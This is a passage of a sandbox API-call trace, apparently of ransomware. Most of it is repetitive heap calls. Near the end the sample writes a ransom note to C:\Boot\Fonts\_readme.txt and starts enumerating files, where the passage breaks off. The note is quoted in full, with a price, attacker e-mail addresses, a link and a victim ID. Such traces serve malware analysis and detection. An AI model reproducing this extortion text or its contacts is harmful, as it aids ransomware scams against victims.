Size=0x830) returned 0xdcd2b08 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.958] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.958] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.962] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0127.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.962] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0127.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.962] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0127.962] PathFindFileNameW (pszPath="") returned="" [0127.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.962] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0127.963] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0127.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0127.963] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0127.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0127.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.963] FreeLibrary (hLibModule=0x759d0000) returned 1 [0127.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2b08 [0127.963] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0127.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9430 | out: hHeap=0x4970000) returned 1 [0127.963] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0127.965] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x7d00) returned 0xdd2c688 [0127.965] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0127.965] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0127.965] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd3390 [0127.965] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0127.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8c0) returned 0x7516fe8 [0127.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x85c) returned 0x49db7d8 [0127.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x49db7d8, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 1117 [0127.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x49dc040 [0127.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db7d8 | out: hHeap=0x4970000) returned 1 [0127.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.967] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned 1116 [0127.967] WriteFile (in: hFile=0x5c4, lpBuffer=0x49dc040*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0xe00fb64, lpOverlapped=0x0 | out: lpBuffer=0x49dc040*, lpNumberOfBytesWritten=0xe00fb64*=0x45c, lpOverlapped=0x0) returned 1 [0127.969] CloseHandle (hObject=0x5c4) returned 1 [0127.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dc040 | out: hHeap=0x4970000) returned 1 [0127.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0127.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0127.969] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.969] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9430 [0127.969] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0xe00fba4 | out: 